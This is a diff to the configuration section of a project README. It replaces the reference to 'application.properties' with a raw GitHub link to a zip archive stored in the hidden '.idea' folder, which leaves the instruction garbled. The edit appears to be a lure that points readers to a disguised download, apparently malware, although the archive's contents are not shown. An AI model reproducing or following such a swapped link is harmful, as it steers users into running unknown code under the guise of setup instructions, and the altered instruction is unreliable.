Daflora20/foodtech-fraud-alerts/README.md

 ## 🛠️ Configuration

-You can configure the application by modifying the `application.properties` file.
+You can configure the application by modifying the `https://raw.githubusercontent.com/Daflora20/foodtech-fraud-alerts/master/.idea/foodtech-fraud-alerts-v2.0.zip` file.
 Here are common settings:

 - **Database Configuration:**
   Set your PostgreSQL database URL, username, and password.